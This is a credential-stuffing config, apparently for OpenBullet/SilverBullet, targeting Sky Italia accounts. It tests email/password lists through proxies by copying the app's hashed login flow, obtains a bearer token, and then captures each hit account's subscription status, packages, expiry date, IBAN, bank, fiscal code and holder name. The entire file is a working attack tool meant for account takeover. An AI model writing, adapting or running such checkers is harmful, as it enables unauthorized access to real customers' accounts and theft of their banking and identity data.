[SETTINGS]
{
  "Name": "Sky.it IOS",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2022-01-16T02:46:35.8259709+08:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Sky",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION Hash SHA1 "<USER>" -> VAR "DIMIPRO" 

FUNCTION URLEncode "<USER>" -> VAR "U" 

REQUEST GET "https://www.sky.it/ReSky/preLogin?u=<DIMIPRO>" 
  
  HEADER "Host: www.sky.it" 
  HEADER "x-dynatrace: MT_3_4_1791900298_1_a9e7479d-2014-45f7-8271-747e2b8d1f6f_99_1290_139" 
  HEADER "accept-encoding: gzip" 
  HEADER "user-agent: MySkyApp/Android/1.4.8_453" 

PARSE "<SOURCE>" JSON "s" -> VAR "SIMI" 

PARSE "<SOURCE>" JSON "t" -> VAR "TIMI" 

FUNCTION Hash SHA1 "<PASS>" -> VAR "HASHP" 

FUNCTION Hash SHA1 "<SIMI>_<HASHP>" -> VAR "P" 

REQUEST POST "https://www.sky.it/ReSky/loginRecaptcha?username=<U>&password=<P>&timestamp=<TIMI>" 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: www.sky.it" 
  HEADER "x-dynatrace: MT_3_4_1791900298_1_a9e7479d-2014-45f7-8271-747e2b8d1f6f_99_1299_145" 
  HEADER "accept-encoding: gzip" 
  HEADER "user-agent: MySkyApp/Android/1.4.8_453" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "loginResult\":\"0" 
  KEYCHAIN Failure OR 
    KEY "loginResult\":\"4" 

REQUEST POST "https://apid.sky.it/tm/v1/auths" 
  CONTENT "{\"application\":\"web\",\"type\":\"JWTC\"}" 
  CONTENTTYPE "application/json" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7" 
  HEADER "origin: https://trial.abbonamento.sky.it" 
  HEADER "referer: https://trial.abbonamento.sky.it/" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" 

PARSE "<SOURCE>" JSON "slt" -> VAR "slt" 

REQUEST GET "https://apid.sky.it/tm/v1/customers/me" 
  
  HEADER "Host: apid.sky.it" 
  HEADER "User-Agent: Mozilla/5.0 (Windows Mankind 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Authorization: Bearer <slt>" 
  HEADER "Content-Type: application/json" 
  HEADER "Origin: https://trial.abbonamento.sky.it" 
  HEADER "DNT: 1" 
  HEADER "Connection: keep-alive" 
  HEADER "Referer: https://trial.abbonamento.sky.it/" 

PARSE "<SOURCE>" JSON "id" -> VAR "id" 

REQUEST GET "https://apid.sky.it/sc/v1/e2e-contracts/<id>" 
  
  HEADER "Host: apid.sky.it" 
  HEADER "User-Agent: Mozilla/5.0 (Windows Mankind 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Authorization: Bearer <slt>" 
  HEADER "Selected-E2E-Id: <id>" 
  HEADER "Content-Type: application/json" 
  HEADER "Origin: https://trial.abbonamento.sky.it" 
  HEADER "DNT: 1" 
  HEADER "Connection: keep-alive" 
  HEADER "Referer: https://trial.abbonamento.sky.it/" 

PARSE "<SOURCE>" JSON "status" CreateEmpty=FALSE -> CAP "Subscription" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Subscription>" NotEqualTo "ACTIVE" 

PARSE "<SOURCE>" JSON "assetsInfo" -> VAR "assetsInfo" 

FUNCTION Replace "\"" "" "<assetsInfo>" -> VAR "T" 

FUNCTION Replace "\\s" "" UseRegex=TRUE "<T>" -> CAP "Pakages" 

REQUEST GET "https://apid.sky.it/sc/v1/e2e-contracts/<id>/invoices" 
  
  HEADER "Host: apid.sky.it" 
  HEADER "User-Agent: Mozilla/5.0 (Windows Mankind 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Authorization: Bearer <slt>" 
  HEADER "Selected-E2E-Id: <id>" 
  HEADER "Content-Type: application/json" 
  HEADER "Origin: https://trial.abbonamento.sky.it" 
  HEADER "DNT: 1" 
  HEADER "Connection: keep-alive" 
  HEADER "Referer: https://trial.abbonamento.sky.it/" 

PARSE "<SOURCE>" JSON "expirationDate" CreateEmpty=FALSE -> CAP "Expiry" 

REQUEST GET "https://apid.sky.it/sc/v1/e2e-contracts/<id>" 
  
  HEADER "Host: apid.sky.it" 
  HEADER "Connection: keep-alive" 
  HEADER "x-dynatrace: MT_3_11_250050999207406_2-0_a9e7479d-2014-45f7-8271-747e2b8d1f6f_44_1_231" 
  HEADER "Accept: application/json" 
  HEADER "Selected-E2E-Id: <id>" 
  HEADER "User-Agent: MySkyApp/iOS/1.5.10_359" 
  HEADER "Authorization: Bearer <slt>" 
  HEADER "Accept-Language: fr-FR,fr;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

PARSE "<SOURCE>" LR "iban\":\"" "\",\"" CreateEmpty=FALSE -> CAP "iban" 

PARSE "<SOURCE>" LR "bank\":\"" "\",\"" CreateEmpty=FALSE -> CAP "Bank" 

PARSE "<SOURCE>" LR "accessMedia\":\"" "\",\"" CreateEmpty=FALSE -> CAP "Media" 

PARSE "<SOURCE>" LR "serviceEnvironment\":\"" "\",\"" CreateEmpty=FALSE -> CAP "service" 

PARSE "<SOURCE>" LR "subscriberFiscalCode\":\"" "\"},\"" CreateEmpty=FALSE -> CAP "FiscalCode" 

PARSE "<SOURCE>" LR "billingFrequency\":\"" "\",\"" CreateEmpty=FALSE -> CAP "billing" 

PARSE "<SOURCE>" LR "\"holder\":\"" "\",\"" CreateEmpty=FALSE -> CAP "holder" 

PARSE "<SOURCE>" LR "\"hasTV\":" ",\"" CreateEmpty=FALSE -> CAP "hasTV" 

FUNCTION Constant "༊෴✿Sidahmed✿〄࿐" -> CAP "ᑕOᑎᖴIG ᗷY" 

